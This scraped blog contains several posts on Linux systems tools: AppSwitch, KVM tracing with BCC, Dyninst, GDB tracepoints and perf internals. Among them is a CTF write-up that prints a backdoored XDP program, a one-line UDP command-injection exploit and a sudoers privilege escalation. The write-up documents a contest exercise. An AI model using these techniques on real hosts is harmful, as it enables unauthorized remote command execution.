So, what’s this AppSwitch thing going around?

I recently read Jérôme Petazzoni’s blog post about a tool called AppSwitch which made some Twitter waves on the busy interwebz. I was intrigued. It turns out that it was something that I was familiar with. When I met Dinesh back in 2015 at Linux Plumbers in Seattle, he had presented me with a grand vision of how applications needs to be free of any networking constraints and configurations and a uniform mechanism should evolve that make such configurations transparent (I’d rather say opaque now). There are layers over layers of network related abstractions. Consider a simple network call made by a java application. It goes through multiple layers in userspace (though the various libs, all the way to native calls from JVM and eventually syscalls) and then multiple layers in kernel-space (syscall handlers to network subsytems and then to driver layers and over to the hardware). Virtualization adds 4x more layers.  Each point in this chain does have a justifiable unique configuration point. Fair point. But from an application’s perspective, it feels like fiddling with the knobs all the time :

christmas_settings
Christmas Settings: https://xkcd.com/1620/

For example, we have of course grown around iptables and custom in-kernel and out of kernel load balancers and even enhanced some of them to exceptional performance (such as XDP based load balancing).  But when it comes to data path processing, doing nothing at all is much better than doing something very efficiently. Apps don’t really have to care about all these myriad layers anyway. So why not add another dimension to this and let this configuration be done at the app level itself? Interesting.. 🤔

I casually asked Dinesh to see how far the idea had progressed and he ended up giving me a single binary and told me that’s it! It seems AppSwitch had been finally baked in the oven.

First Impressions

So there is a single static binary named ax which runs as an executable as well as in a daemon mode. It seems AppSwitch is distributed as a docker image as well though. I don’t see any kernel module (unlike what Jerome tested). This is definitely the userspace version of the same tech.

I used the ax docker image.  ax was both installed and running with one docker-run command.

$ docker run -d --pid=host --net=none -v /usr/bin:/usr/bin -v /var/run/appswitch:/var/run/appswitch --privileged docker.io/appswitch/ax 

Based on the documentation, this little binary seems to do a lot — service discovery, load balancing, network segmentation etc.  But I just tried the basic features in a single-node configuration.

Let’s run a Java webserver under ax.

# ax run --ip 1.2.3.4 -- java -jar SimpleWebServer.jar

This starts the webserver and assigns the ip 1.2.3.4 to it. Its like overlaying the server’s own IP configurations through ax such that all request are then redirected through 1.2.3.4. While idling, I didn’t see any resource consumption in the ax daemon. If it was monitoring system calls with auditd or something, I’d have noticed some CPU activity. Well, the server didn’t break, and when accessed via a client run through ax, it starts serving just fine.

# ax run --ip 5.6.7.8 -- curl -I 1.2.3.4

HTTP/1.0 500 OK
Date: Wed Mar 28 00:19:25 PDT 2018
Server: JibbleWebServer/1.0
Content-Type: text/html
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Length: 58 Last-modified: Wed Mar 28 00:19:25 PDT 2018 

Naaaice! 🙂 Why not try connecting with Firefox. Ok, wow, this works too!

ax-firefox

I tried this with a Golang http server (Caddy) that is statically linked.  If ax was doing something like LD_PRELOAD, that would trip it up. This time I tried passing a name rather than the IP and ran it as regular user with a built-in --user option

# ax run --myserver --user suchakra -- caddy -port 80

# ax run --user suchakra -- curl -I myserver
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=utf-8
Etag: "p6f4lv0"
Last-Modified: Fri, 30 Mar 2018 19:25:07 GMT
Server: Caddy
Date: Sat, 31 Mar 2018 01:52:28 GMT

So no kernel module tricks, it seems. I guess this explains why Jerome called it “Network Stack from the future”. The future part here is applications and with predominant containerized deployments, the problems of microservices networking have really shifted near to the apps.

We need to get rid of the overhead caused by networking layers and frequent context switches happening as a single containerized app communicates with another one. AppSwitch could potentially just eliminate this all together and the communication would actually resemble traditional socket based IPC mechanisms with an advantage of a zero overhead read/write cost once the connection is established. I think I would want to test this out thoroughly sometime in the future if i get some time off from my bike trips 🙂

How does it work?

Frankly I don’t know in-depth, but I can guess. All applications, containerized or not, are just a bunch of executables linked to libs (or built statically) running over the OS. When they need OS’s help, they ask. To understand an application’s behavior or to morph it, OS can help us understand what is going on and provide interfaces to modify its behavior. Auditd for example, when configured, can allow us to monitor every syscall from a given process. Programmable LSMs can be used to set per-resource policies through kernel’s help. For performance observability, tracing tools have traditionally allowed an insight into what goes on underneath. In the world of networking, we again take the OS’s help – routing and filtering strategies are still defined through iptables with some advances happening in BPF-XDP. However, in the case of networking, calls such as connect(), accept() could be intercepted purely in userspace as well. But doing so robustly and efficiently without application or kernel changes with reasonable performance has been a hard academic problem for decades [1][2]. There must be some other smart things at work underneath in ax to keep this robust enough for all kinds of apps. With interception problem solved, this would allow ax to create a map and actually perform the ‘switching’ part (which I suppose justifies the AppSwitch name). I have tested it presently on a Java, Go and a Python server. With network syscall interception seemingly working fine, the data then flows like hot knife on butter. There may be some more features and techniques that I may have missed though. Going through ax --help it seems there are some options for egress, WAN etc, but I haven’t played it with that much. 

Some Resources

References

[1] Practical analysis of stripped binary code [link]
[2] Analyzing Dynamic Binary Instrumentation Overhead [link]

Advertisements

An entertaining eBPF XDP adventure

In this post, I discuss about the CTF competition track of NorthSec, an awesome security conference and specifically about our tale of collecting two elusive flags that happened to be based upon eBPF XDP technology – something that is bleeding edge and uber cool!

In case you did not know, eBPF eXpress Data Path (XDP) is redefining how network traffic is handled on devices. Filtering, routing and reshaping of incoming packets at a very early stage even before the packets enter the networking stack the other Linux kernel has allowed unprecedented speed and provides a base for applications in security (DDoS mitigation), networking and performance domain. There is a lot of material from Quentin Monnet, Julia Evans, Cilium and IOVisor projects, about what eBPF/XDP is capable of. For the uninitiated, generic information about eBPF can also be found on Brendan Gregg’s eBPF page and links. If you think you want to get serious about this, here are some more links and detailed docs. In a recent talk I gave, I showed a diagram similar to the one below – as I started teasing myself on the possible avenues beyond the performance monitoring and tracing usecase that is dear to my heart :

cls-xdp
TC with cls_bpf and XDP. Actions on packet data is taken at the driver level in XDP

The full presentation is here. So, what’s interesting here is that the incoming packets from the net-device can now be statefully filtered or manipulated even before they reach the network stack. This has been made possible by the use of extended Berkeley Packet Filter (eBPF) programs which allows such low-level actions at the driver level to be flexibly programmed in a safe manner from the userspace. The programming is done in a restricted-C syntax that gets compiled to BPF bytecode by LLVM/Clang. The bpf() syscall then allows the bytecode to be sent to the kernel at proper place – here, these are the ‘hooks’ at ingress and egress of raw packets. Before getting attached, the program goes through a very strict verifier and an efficient JIT compiler that converts the BPF programs to native machine code (which is what makes eBPF pretty fast) Unlike the register struct context for eBPF programs attached to Kprobes, the context passed to the XDP eBPF programs is the XDP metadata struct. The data is directly read and parsed from within the BPF program, reshaped if required and an action taken for it. The action can be either XDP_PASS, where it is passed to the network stack as seen in the diagram, or XDP_DROP, where it dropped by essentially sending it back to the driver queue and XDP_TX which sends the packets back to the NIC they came from. While the packet PASS and DROP can be a good in scenarios such as filtering IPs, ports and packet contents, the TX usecase is more suited for load balancing where the packet contents can be modified and transmitted back to the NIC. Currently, Facebook is exploring its use and presented their load balancing and DDoS prevention framework based on XDP in the recent Netdev 2.1 in Montreal. Cilium Project is another example of XDP’s use in container networking and security and is an important project resulting from the eBPF tech.

NorthSec BPF Flag – Take One

Ok, enough of XDP basics for now. Coming back to the curious case of a fancy CTF challenge at NorthSec, we were presented with a VM and told that “Strange activity has been detected originating from the rao411 server, but our team has been unable to understand from where the commands are coming from, we need your help.” It also explicitly stated that the machine was up-to-date Ubuntu 17.04 with an unmodified kernel. Well, for me that is a pretty decent hint that this challenge would require kernel sorcery. Simon checked the /var/log/syslog and saw suspicions prints every minute or two that was causing the /bin/true command to run. Pretty strange. We sat together and still tried to use netcat to listen to network chatter on multiple ports as we guessed that something was being sent from outside to the rao411 server.  Is it possible that the packets were somehow being dropped even before they reached the network stack? We quickly realized that what we were seeing was indeed related to BPF as we saw some files lying around in the VM which looked like these (post CTF event, Julien Desfossez, who designed the challenge has been generous enough to provide the code, which itself is based on Jesper Dangaard Brouer’s code in the kernel source tree) As we see, there are the familiar helper functions used for loading BPF programs and manipulating BPF maps. Apart from that, there was the xdp_nsec_kern.c file which contained the BPF program itself! A pretty decent start it seems 🙂 Here is the code for the parse_port() function in the BPF XDP program that is eventually called when a packet is encountered :


u32 parse_port(struct xdp_md *ctx, u8 proto, void *hdr)
{
void *data_end = (void *)(long)ctx->data_end;
struct udphdr *udph;
u32 dport;
char *cmd;
unsigned long payload_offset;
unsigned long payload_size;
char *payload;
u32 key = 0;

if (proto != IPPROTO_UDP) {
return XDP_PASS;
}

udph = hdr;
if (udph + 1 > data_end) {
return XDP_ABORTED;
}

payload_offset = sizeof(struct udphdr);
payload_size = ntohs(udph->len) - sizeof(struct udphdr);

dport = ntohs(udph->dest);
if (dport == CMD_PORT + 1) {
return XDP_DROP;
}

if (dport != CMD_PORT) {
return XDP_PASS;
}

if ((hdr + payload_offset + CMD_SIZE) > data_end) {
return XDP_ABORTED;
}
cmd = bpf_map_lookup_elem(&nsec, &key);
if (!cmd) {
return XDP_PASS;
}
memset(cmd, 0, CMD_SIZE);
payload = &((char *) hdr)[payload_offset];
cmd[0] = payload[0];
cmd[1] = payload[1];
cmd[2] = payload[2];
cmd[3] = payload[3];
cmd[4] = payload[4];
cmd[5] = payload[5];
cmd[6] = payload[6];
cmd[7] = payload[7];
cmd[8] = payload[8];
cmd[9] = payload[9];
cmd[10] = payload[10];
cmd[11] = payload[11];
cmd[12] = payload[12];
cmd[13] = payload[13];
cmd[14] = payload[14];
cmd[15] = payload[15];

return XDP_PASS;
}

Hmmm… this is a lot of information. First, we observe that the destination port is extracted from the UDP header by the BPF program and the packets are only passed if the destination port is CMD_PORT (which turns out to be 9000 as defined in the header xdp_nsec_common.h). Note that the XDP actions are happening too early, hence even if we were to listen at port 9000 using netcat, we would not see any activity. Another pretty interesting thing is that some payload from the packet is being used to prepare a cmd string. What could that be? Why would somebody prepare a command from a UDP packet? 😉

Lets dig deep. So, the /var/log/syslog was saying that it is executing xdp_nsec_cmdline intermittently and executing /bin/true. Maybe there is something in that file? A short glimpse of xdp_nsec_cmdline.c confirms our line of thought! Here is the snippet from its main function :

int main(int argc, char **argv)
{
.
.
    cmd = malloc(CMD_SIZE * sizeof(char));
    fd_cmd = open_bpf_map(file_cmd);

    memset(cmd, 0, CMD_SIZE);
    ret = bpf_map_lookup_elem(fd_cmd, &key, cmd);
    printf("cmd: %s, ret = %d\n", cmd, ret);
    close(fd_cmd);
    ret = system(cmd);
.
.
}

The program opens the pinned BPF map file_cmd (which actually is /sys/fs/bpf/nsec) and looks up the value stored and executes it. Such Safe. Much Wow. It seems we are very close. We just need to craft a UDP packet which then updates the map with the command in payload. The first flag was a file called flag which was not accessible by the logged in raops user. So we just made a script in /tmp which changed permission for that file and sent the UDP packet containing our script.

Trivia! Bash has an alias to send UDP packets :
echo -n "/tmp/a.sh" >/dev/udp//9000 

So, we now just had to wait for the program to run the xdp_nsec_cmdline which would trigger our script. And of course it worked! We opened the flag and submitted it. 6 points to InfoSecs!

NorthSec BPF Flag – Take Two

Of course, our immediate action next was to add raops user to /etc/sudoers 😉 Once we had root access, we could now recompile and re-insert the BPF program as we wished. Simon observed an interesting check in the BPF XDP program listed above that raised our brows :

...
    if (dport == CMD_PORT + 1) {
        return XDP_DROP;
    }

    if (dport != CMD_PORT) {
        return XDP_PASS;
    }
...

Why would someone want to drop the packets coming at 9001 explicitly? Unless..there was a message being sent on that port from outside! While not an elegant approach, we just disabled the XDP_DROP check so that the packet would reach the network stack and we could just netcat the data on that port. Recompile, re-insert and it worked! The flag was indeed being sent on 9001 which was no longer dropped now. 8 points to InfoSecs!

Mandatory cool graphic of us working

I really enjoyed this gamification of advanced kernel tech as it increases its reach to the young folks interested in Linux kernel internals and modern networking technologies. Thanks to Simon Marchi for seeing this through with me and Francis Deslauriers for pointing out the challenge to us! Also, the NorthSec team (esp. Julien Desfossez and Michael Jeanson) who designed this challenge and made the competition more fun for me! Infact Julien started this while watching the XDP talks at Netdev 2.1. Also, thanks to the wonderful lads Marc-Andre, Ismael, Felix, Antoine and Alexandre from University of Sherbrooke who kept the flag chasing momentum going 🙂 It was a fun weekend! That’s all for now. If I get some more time, I’d write about an equally exciting LTTng CTF (Common Trace Format) challenge which Simon cracked while I watched from the sidelines.

EDIT : Updated the above diagram to clarify that XDP filtering happens early at the driver level – even before TC ingress and egress. TC with cls_bpf also allows BPF programs to be run. This was indeed a precursor to XDP.

Analyzing KVM Hypercalls with eBPF Tracing

I still visit my research lab quite often. It’s always nice to be in the zone where boundaries of knowledge are being pushed further and excitement is in the air. I like this ritual as this is a place where one can discuss linux kernel code and philosophy of life all in a single sentence while we quietly sip our hipster coffee cups.

In the lab, Abder is working these days on some cool hypercall stuff. The exact details of his work are quite complex, but he calls his tool hypertrace. I think I am sold on the name already. Hypercalls are like syscalls, but instead of such calls going to a kernel, they are made from guest to the hypervisor with arguments and an identifier value (just like syscalls). The hypervisor then brokers the privileged operation for the guest. Pretty neat. Here is some kernel documentation on hypercalls.

So Abder steered one recent discussion towards internals of KVM and wanted to know the latency caused by a hypercall he was introducing for his experiments (as I said he is introducing new hypercall with an id – for example 42). His analysis usecase was quite specific – he wanted to trace the kvm_exit -> kvm_hypercall -> kvm_entry sequence to know the exact latency he was causing for a given duration. In addition the tracing overhead needs to be minimum and is for a short duration only. This is somewhat trivial. These 3 tracepoints are there in the kernel already and he could latch on to them. Essentially, he needs to look for exit_reason argument of the kvm_exit tracepoint and it should be a VMCALL (18), which would denote that a hypercall is coming up next. Then he could look at the next kvm_exit event and find the time-delta to get the latency. Even though it is possible by traditional tracing such as LTTng and Ftrace to record events, Abder was only interested in his specific hypercall (nr = 42) along with the kvm_exit that happened before (with exit_reason = 18) and kvm_entry after that. This is not straightforward. It’s not possible to do such specific tracing with traditional tracers at a high speed and low overhead. This means the selection of events should not just be a simple filter, but should be stateful. Just when Abder was about to embark on a journey of kprobes and kernel modules, I once more got the opportunity of being Morpheus and said “What if I told you…

The rest is history. (dramatic pause)

Jokes apart, here is a small demo of eBPF/BCC script that allows us to hook onto the 3 aforementioned tracepoints in the Linux kernel and conditionally record the trace events:

from __future__ import print_function
from bcc import BPF

# load BPF program
b = BPF(text="""
#define EXIT_REASON 18
BPF_HASH(start, u8, u8);

TRACEPOINT_PROBE(kvm, kvm_exit) {
    u8 e = EXIT_REASON;
    u8 one = 1;
    if (args->exit_reason == EXIT_REASON) {
        bpf_trace_printk("KVM_EXIT exit_reason : %d\\n", args->exit_reason);
        start.update(&e, &one);
    }
    return 0;
}

TRACEPOINT_PROBE(kvm, kvm_entry) {
    u8 e = EXIT_REASON;
    u8 zero = 0;
    u8 *s = start.lookup(&e);
    if (s != NULL && *s == 1) {
        bpf_trace_printk("KVM_ENTRY vcpu_id : %u\\n", args->vcpu_id);
        start.update(&e, &zero);
    }
    return 0;
}

TRACEPOINT_PROBE(kvm, kvm_hypercall) {
    u8 e = EXIT_REASON;
    u8 zero = 0;
    u8 *s = start.lookup(&e);
    if (s != NULL && *s == 1) {
        bpf_trace_printk("HYPERCALL nr : %d\\n", args->nr);
    }
    return 0;
};
""")

# header
print("%-18s %-16s %-6s %s" % ("TIME(s)", "COMM", "PID", "EVENT"))

# format output
while 1:
    try:
        (task, pid, cpu, flags, ts, msg) = b.trace_fields()
    except ValueError:
        continue

    print("%-18.9f %-16s %-6d %s" % (ts, task, pid, msg))

The TRACEPOINT_PROBE() interface in BCC allows us to use static tracepoints in the kernel. For example, whenever a kvm_exit occurs in the kernel, the first probe is executed and it records the event if the exit reason was VMCALL. At the same time it updates a BPF hash map, which basically acts like a flag here for other events. I recommend you to check out Lesson 12 from the BCC Python Developer Tutorial if this seems interesting to you 🙂 In addition, perhaps the reference guide lists the most important C and Python APIs for BCC.

To test the above example out, we can introduce our own hypercall in the VM using this small test program :

#define do_hypercall(nr, p1, p2, p3, p4) \
__asm__ __volatile__(".byte 0x0F,0x01,0xC1\n"::"a"(nr), \
    "b"(p1), \
    "c"(p2), \
    "d"(p3), \
    "S"(p4))

void main()
{
    do_hypercall(42, 0, 0, 0, 0);
}

While the BPF program is running, if we do a hypercall, we get the following output :

TIME(s)            COMM             PID    EVENT
1795.472072000     CPU 0/KVM        7288   KVM_EXIT exit_reason : 18
1795.472112000     CPU 0/KVM        7288   HYPERCALL nr : 42
1795.472119000     CPU 0/KVM        7288   KVM_ENTRY vcpu_id : 0

So we see how in a few minutes we could precisely gather only those events that were of interest to us – saving us from the hassle of setting up other traces or kernel modules. eBPF/BCC based analysis allowed us to conditionally trace only a certain subsection of events instead of the huge flow of events that we would have had to analyze offline. KVM  internals are like a dark dungeon and I feel as if I am embarking on a quest here. There are a lot more upcoming KVM related analysis we are doing with eBPF/BCC. Stay tuned for updates! If you find any more interesting usecases for eBPF in the meantime, let me know. I would love to try them out! As always, comments, corrections and criticisms are welcome.

Unravelling Code Injection in Binaries

It seems pretty surreal going through old lab notes again. It’s like a time capsule – an opportunity to laugh at your previous stupid self and your desperate attempts at trying to rectify that situation. My previous post on GDB’s fast tracepoints and their clever use of jump-pads longs for a more in-depth explanation on what goes on when you inject your own code in binaries.

Binary Instrumentation

The ability to inject code dynamically in a binary – either executing or on disk gives huge power to the developer. It basically eliminates the need of source code and re-compilation in most of the cases where you want to have your own small code run in a function and which may change the flow of program. For example, a tiny tracer that counts the number of time a certain variable was assigned a value of 42 in a target function. Through binary instrumentation, it becomes easy to insert such tiny code snippets for inexpensive tracing even in production system and then safely remove them once we are done – making sure that the overhead of static tracepoints is avoided as well. Though a very common task in security domain, binary instrumentation also forms a basis for debuggers and tracing tools. I think one of the most interesting study material to read from an academic perspective is Nethercote’s PhD Thesis. Through this, I learnt about the magic of Valgrind (screams for a separate blog post), the techniques beyond breakpoints and  trampolines. In reality, most of us may not usually look beyond ptrace() when we hear about playing with code instrumentation. GDB’s backbone and some of my early experiments for binary fun have been with ptrace() only. While Eli Bendersky explains some of the debugger magic and the role of ptrace() in sufficient detail, I explore more on what happens when the code is injected and it modifies the process while it executes.

Primer

The techniques for binary instrumentation are numerous. The base of all the approaches is the ability to halt the process,identify an instrumentation point (a function, an offset from function start, an address etc.), modify its memory at that point, execute code and rewrite/restore registers. For on-disk dynamic instrumentation, the ability to load the binary, parse, disassemble and patch it with instrumentation code is required. There are then multiple ways to insert/patch the binary. In all these ways, there is always a tradeoff between overhead (size and the added time due to extra code added), control over the binary (how much and where can we modify) and robustness (what if the added code makes the actual execution unreliable – for example, loops etc.). From what I have understood from my notes, I basically classify ways to go about code patching. There may be more crazy ones (such as those used in viruses) but for tracing/debugging tools most of them are as follows :

  • TRAP Based : I already discussed this in the last post with GDB’s normal tracepoints. Such a technique is also used in older non-optimized Kprobes. An exception causing instruction (such as int 3) is inserted at the desired point and its handler calls the code which you want to execute. Pretty standard stuff.
  • JIT Recompilatin Based : This is something more interesting and is used by Valgrind. The binary is first disassembled, and converted to an intermediate representation (IR). Then IR is instrumented with the analysis code from the desired Valgrind tool (such as memcheck). The code is recompiled, stored in a code-cache and executed on a ‘synthetic CPU’. This is like JIT compilation but applied to analysis tools. The control over the information that can be gathered in such cases is very high, but so is the overhead (can go from 4x-50x slower in various cases).
  • Trampoline Based : Boing! Basically, we just patch the location with a jump to a jump-pad or trampoline (different name for same thing). This trampoline can execute the displaced instructions and then prepare another jump to the instrumented code and then back to the actual code. This out-of-line execution maintains sufficient speed, reduced overhead as no TRAP, context switch or handler call is involved. Many binary instrumentation frameworks such as Dyninst are built upon this. We will explain this one in further detail.

Dyninst’s Trampoline

Dyninst’s userspace-only trampoline approach is quite robust and fast. It has been used in performance analysis tools such as SystemTap, Vampir and Tau and hence a candidate for my scrutiny. To get a feel of what happens under the hood, lets have a look at what Dyninst does to our code when it patches it.

Dyninst provides some really easy to use APIs to do the heavy lifting for you. Most of them are very well documented as well. Dyninst introduces the concept of mutator which is the program that is supposed to modify the target or mutatee. This mutatee can either be a running application or a binary residing on disk. The process attaching or creating a new target process allows the mutator to control the execution of the mutatee. This can be achieved by either processCreate() or processAttach(). The mutator then gets the program image using the object, which is a static representation of the mutatee. Using the program image, the mutator can identify all possible instrumentation points
in the mutatee. The next step is creating a snippet (or the code you want to insert) for insertion at the identified point. The mutator can then create a snippet, to be inserted into the mutatee. Building small snippets can be trivial. For example, small snippets can be defined using the BPatch arithExpr and BPatch varExp types. Here is a small sample. The snippet is compiled into machine language and copied into the application’s address space. This is easier said than done though. For now, we just care about how the snippet affects our target process.

Program Execution flow

The Dyninst API inserts this compiled snippet at the instrumentation points. Underneath is the familiar ptrace() technique of pausing and poking memory. The instruction at the instrumentation point is replaced by a jump to a base trampoline. The base trampoline then jumps to a mini-trampoline that starts by saving any registers that will be modified. Next, the instrumentation is executed. The mini-trampoline then restores the necessary registers, and jumps back to the base trampoline. Finally, the base trampoline executes the replaced instruction and jumps back to the instruction after the instrumentation point. Here is a relevant figure taken from this paper :

dyninst-working

As part of some trials, I took a tiny piece of code and inserted a snippet at the end of the function foo(). Dyninst changed it to the following :

dyninst-jmp

Hmm.. interesting. So the trampoline starts at 0x10000 (relative to PC). Our instrumentation point was intended to be function exit. It means Dyninst just replaces the whole function in this case. Probably it is safer this way rather than replacing a single or a small set of instructions mid function. Dynisnt’s API check for many other things when building the snippet. For example, we need to see if the snippet contains code that recursively calls itself causing the target program to stop going further. More like a verifier of code being inserted (similar to eBPF’s verifier in Linux kernel which checks for loops etc before allowing the eBPF bytecode execution). So what is the trampoline doing? I used GDB to hook onto what is going on and here is a reconstruction of the flow :

dyninst-mod

Clearly, the first thing the trampoline does is execute the remaining function out of line, but before returning, it start preparing the snippet’s execution. The snippet was a pre-compiled LTTng tracepoint (this is a story for another day perhaps) but you don’t have to bother much. Just think of it as a function call to my own function from within the target process. First the stack is grown and the machine registers are pushed on to the stack so that we can return to the state where we were after we have executed the instrumented code. Then it is grown further for snippet’s use. Next, the snippet gets executed (the gray box) and the stack is shrunk back again to the same amount. The registers pushed on the stack are restored along with the original stack pointer and we return as if nothing happened. There is no interrupt, no context-switch, no lengthy diversions. Just simple userspace code 🙂

So now we know! You can use Dyninst and other such frameworks like DynamoRIO or PIN to build your own tools for tracing and debugging. Playing with such tools can be insane fun as well. If you have any great ideas or want me to add something in this post, leave a comment!

Fast Tracing with GDB

Even though GDB is a traditional debugger, it provides support for dynamic fast user-space tracing. Tracing in simple terms is super fast data logging from a target application or the kernel. The data is usually a superset of what a user would normally want from debugging but cannot get because of the debugger overhead. The traditional debugging approach can indeed alter the correctness of the application output or alter its behavior. Thus, the need for tracing arises. GDB in fact is one of the first projects which tried to have an integrated approach of debugging and tracing using the same tool. It has been designed in a manner such that sufficient decoupling is maintained – allowing it to expand and be flexible. An example is the use of In-Process Agent (IPA) which is crucial to fast tracing in GDB but is not necessary for TRAP-based normal tracepoints.

GDB’s Tracing Infrastructure

The tracing is performed by trace and collect commands. The location where the user wants to collect some data is called a tracepoint. It is just a special type of breakpoint without support of running GDB commands on a tracepoint hit. As the program progresses, and passes the tracepoint, data (such as register values, memory values etc) gets collected based on certain conditions (if desired so). The data collection is done in a trace buffer when the tracepoint is hit. Later, that data can be examined from the collected trace snapshot using tfind. However, tracing for now is restricted to remote targets (such as gdbserver). Apart from this type of dynamic tracing, there is also support for static tracepoints in which instrumentation points known as markers are embedded in the target and can be activated or deactivated.  The process of installing these static tracepoints is known as probing a marker. Considering that you have started GDB and your binary is loaded, a sample trace session may look something like this :

(gdb) trace foo
(gdb) actions
Enter actions for tracepoint #1, one per line.
> collect $regs,$locals
> while-stepping 9
  > collect $regs
  > end
> end
(gdb) tstart
[program executes/continues...]
(gdb) tstop

This puts up a tracepoint at foo, collects all register values at tracepoint hit, and then for subsequent 9 instruction executions, collects all register values. We can now analyze the data using tfind or tdump.

(gdb) tfind 0
Found trace frame 0, tracepoint 1
54    bar    = (bar & 0xFF000000) >> 24;

(gdb) tdump
Data collected at tracepoint 1, trace frame 0:
rax    0x2000028 33554472
rbx    0x0 0
rcx    0x33402e76b0 220120118960
rdx    0x1 1
rsi    0x33405bca30 220123089456
rdi    0x2000028 33554472
rbp    0x7fffffffdca0 0x7fffffffdca0
rsp    0x7fffffffdca0 0x7fffffffdca0
.
.
rip    0x4006f1 0x4006f1 <foo+7>
[and so on...]

(gdb) tfind 4
Found trace frame 4, tracepoint 1
0x0000000000400700 55    r1 = (bar & 0x00F00000) >> 20;

(gdb) p $rip
$1 = (void (*)()) 0x400700 <foo+22>

So one can observe data collected from different trace frames in this manner and even output to a separate file if required. Going more in depth to know how tracing works, lets see the GDB’s two tracing mechanisms :

Normal Tracepoints

These type of tracepoints are the basic default tracepoints. The idea of their use is similar to breakpoints where GDB replaces the target instruction with a TRAP or any other exception causing instruction. On x86, this can usually be an int 3 which has a special single byte instruction – 0xCC reserved for it. Replacing a target instruction with this 1 byte ensures that the normal instructions are not corrupted. So, during the execution of the process, the OS hits the int 3 where it halts and program state is saved. The OS sends a SIGTRAP signal to the process. As GDB is attached or is running the process, it receives a SIGCHLD as a notification, that something happened with a child. It does a wait(), which will tell it that process has received a SIGTRAP. Thus the SIGTRAP never reaches the process as GDB intercepts it. The original instruction is first restored, or executed out-of-line for non-stop multi-threaded debugging. GDB transfers the control to the trace collection which does the data collection part upon evaluating any condition set. The data is stored into a trace buffer. Then, the original instruction is replaced again with the tracepoint and normal execution continues. This all fine and good, but there is a catch – the TRAP mechanism alters the flow of the application and the control is passed to the OS which leads to some delay a compromise in speed. But even with that, because of a very restrictive conditional tracing design, and better interaction of interrupt-driven approaches with instruction caches, normal interrupt- based tracing in GDB is a robust technique. A faster solution would indeed be a pure user-space approach, where everything is done at the application level.

Fast Tracepoints

Owing to the limitations stated above, a fast tracepoint approach was developed. This special type of tracepoint uses a dynamic tracing approach. Instead of using the breakpoint approach, GDB uses a mix of IPA and remote target (gdbserver) to replace the target instruction with a 5 byte jump to a special section in memory called a jump-pad. This jump-pad, also known as a trampoline, first pushes all registers to stack (saving the program state). Then, it calls the collector  function for trace data collection, it executes the displaced instruction out-of-line, and jumps back to the original instruction stream. I will probably write something more about how trampolines work and some techniques used in dynamic instrumentation frameworks like Dyninst in a subsequent post later on.

gdb-working

Fast tracepoints can be used with command ftrace, almost exactly like with the trace command. A special command in the following format is sent to the In-Process Agent by gdbserver as,

FastTrace:<tracepoint_object><jump_pad>

where <tracepoint object> is the object containing bytecode for conditional tracing, address, type, action etc. and <jump pad> is the 8-byte long head of the jump pad location in the memory. The IPA prepares all that and if all goes well, responds to such a  query by,

OK<target_address><jump_pad><fjump_size><fjump>

where <target address> is the address where the tracepoint is put in the inferior, <jump_pad> is the updated address of the jump pad head and the <fjump> and <fjump_size> are the jump instruction sequence and its size copied to the command buffer, sent back by IPA. The remote target (gdbserver) then modifies the memory of the target process. Much more fine grained information about fast tracepoint installation is available in the GDB documentation. This is a very pure user-space approach to tracing. However, there is a catch – the target instruction to be replaced should be at least 5 bytes long for this to work as the jump is itself 5 byte long (on Intel x86). This means that fast tracepoints using GDB cannot be put everywhere. How code is modified when patching a 5 bytes instruction is a discussion of another time. This is probably the fastest way yet to perform dynamic tracing and is a good candidate for such work.

The GDB traces can be saved with tsave and with the –ctf switch may be exported to CTF also. I have not tried this but hopefully it should at least open the traces with TraceCompass for further analysis. The GDB’s fast tracepoint mechanism is quite fast I must say – but in terms of usability, LTTng is a far better and advanced option. GDB however allows dynamic insertion of tracepoints and the tracing features are well integrated in your friendly neighborhood debugger. Happy Tracing!

Deconstructing Perf’s Data File

It is no mystery that Perf is like a giant organism written in C with an infinitely complex design. Of course, there is no such thing. Complexity is just a state of mind they would say and yes, it starts fading away as soon as you get enlightened. So, one fine day, I woke up and decided to understand how the perf.data file works because I wanted to extract the Intel PT binary data from it. I approached Francis and we started off on an amazing adventure (which is still underway). If you are of the impatient kind, here is the code.

A Gentle Intro to Perf

I would not delve deep into Perf right now. However, the basics are simple to grasp. It is like a Swiss army knife which contains tools to understand your system from either a very coarse to a quite fine granularity level. It can go all the way from profiling, static/dynamic tracing to custom analyses build up on hardware performance counters. With custom scripts, you can generate call-stacks, Flame Graphs and what not! Many tracing tools such as LTTng also support adding perf contexts to their own traces. My personal experience with Perf has usually been just to profile small piece of code. Sometimes I use its annotate feature to look at the disassembly to see instruction profiling right from my terminal. Occasionally, I use it to get immediate stats on system events such as syscalls etc. Its fantastic support with the Linux kernel owing to the fact that it is tightly bound to each release, means that you can always have reliable information. Brendan Gregg has written so much about it as part of his awesome Linux performance tools posts. He has some some actual useful stuff you can do with Perf. My posts here just talks about some of its internals. So, if Perf was a dinosaur, I am just talking about its toe in this post.

Perf contains a kernel part and a userspace part. The userspace part of Perf is located in the kernel directory tools/perf. The perf command that we use is compiled here. It reads kernel data from the Perf buffer based on the events you select for recording. For a list of all events you can use, do perf list or sudo perf list. The data from the Perf’s buffer is then written to the perf.data file. For hardware traces such as in Intel PT, the extra data is written in auxiliary buffers and saved to the data file. So to get your own custom stuff out from Perf, just read its data file. There are multiple ways like using scripts too, but reading a binary directly allows for a better learning experience. But the perf.data is like a magical output file that contains a plethora of information based on what events you selected, how the perf record command was configured. With hardware trace enabled, it can generate a 200MB+ file in 3-4 seconds (yes, seriously!). We need to first know how it is organized and how the binary is written.

Dissection Begins

Rather than going deep and trying to understand scripted ways to decipher this, we went all in and opened the file with a hex editor. The goal here was to learn how the Intel PT data can be extracted from the AUX buffers that Perf used and wrote in the perf.data file. By no means is this the only correct way to do this. There are more elegant solutions I think, esp. if you see some kernel documentation and the uapi perf_event.h file or see these scripts for custom analysis. Even then, this can surely be a good example to tinker around more with Perf. Here is the workflow:

  1. Open the file as hex. I use either Vim with :%!xxd command or Bless. This will come in handly later.
  2. Use perf report -D to keep track of how Perf is decoding and visualizing events in the data file in hex format.
  3. Open the above command with GDB along with the whole Perf source code. It is in the tools/perf directory in kernel source code.

If you setup your IDE to debug, you would also have imported the Perf source code. Now, we just start moving incrementally – looking at the bytes in the hex editor and correlating them with the magic perf report is doing in the debugger. You’ll see lots of bytes like these :

Screenshot from 2016-06-16 19-01-42

A cursory looks tells us that the file starts with a magic – PERFFILE2. Searching it in the source code eventually leads to the structure that defines the file header:

struct perf_file_header {
   u64 magic;
   u64 size;
